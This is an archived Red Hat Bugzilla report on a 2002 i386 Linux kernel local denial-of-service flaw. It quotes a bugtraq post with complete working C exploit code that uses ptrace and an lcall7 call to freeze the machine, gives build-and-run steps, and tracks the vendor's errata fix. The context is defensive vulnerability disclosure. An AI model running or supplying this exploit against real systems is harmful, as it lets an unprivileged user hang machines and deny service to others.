Bug 77834 - Working Dos from bugtraq mailing list
Summary: Working Dos from bugtraq mailing list
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: kernel
Version: 8.0
Hardware: i686
OS: Linux
high
medium
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
URL:
Whiteboard:
Depends On:
Blocks:
Reported: 2002-11-14 07:42 UTC by Leonid Mamtchenkov
Modified: 2007-03-27 03:58 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2002-11-16 11:06:56 UTC
Embargoed:




Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2002:262 0 normal SHIPPED_LIVE : New kernel fixes local denial of service issue 2002-09-23 04:00:00 UTC
Red Hat Product Errata RHSA-2002:263 0 normal SHIPPED_LIVE Important: kernel security update 2002-09-23 04:00:00 UTC

Description Leonid Mamtchenkov 2002-11-14 07:42:49 UTC
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
"
From: Christophe Devine <DEVINE.fr>
To: bugtraq
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS


On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>
#include <sys/wait.h>   /* wait() */
#include <unistd.h>     /* fork(), usleep() */

/* i386 register layout as returned by PTRACE_GETREGS on 2.4 kernels */
struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    /* lcall $0x7,$0x0 : far call through the kernel's lcall7 gate */
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        /* child: give the parent time to attach, then enter the gate */
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        /* parent: trace the child and rewrite its flags at every stop */
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

--
Christophe Devine
"

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):
kernel-2.4.18-17.8.0


How Reproducible:
Always

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:

Comment 1 Arjan van de Ven 2002-11-14 09:07:28 UTC
yes we know about this; I built packages yesterday and they're in QA now

Comment 2 Arjan van de Ven 2002-11-16 11:06:56 UTC
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2002-262.html


Comment 3 Frederic Hermann 2002-11-18 10:44:15 UTC
This bug affects Red Hat Linux 6.2 as well. I ran the program above on an up-to-date RH6.2 box, as an unprivileged user, and the box totally hung.

